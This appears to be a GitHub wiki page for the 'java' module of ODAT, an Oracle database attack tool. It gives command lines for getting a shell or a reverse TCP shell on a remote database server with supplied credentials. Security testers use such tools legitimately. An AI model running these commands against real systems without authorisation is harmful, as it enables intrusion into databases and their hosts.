-
Notifications
You must be signed in to change notification settings - Fork 345
java
quentinhardy edited this page Mar 24, 2016
·
2 revisions
This module can be used to execute system commands on a remote database server. Useful to get a shell or a reverse tcp shell.
- To get a shell on the database server:
./odat.py java -s $SERVER -d $SID -U $USER -P $PASSWORD --shell
- To get a reverse tcp shell:
./odat.py java -s $SERVER -d $SID -U $USER -P $PASSWORD --reverse-shell
Quentin HARDY: [email protected] or [email protected]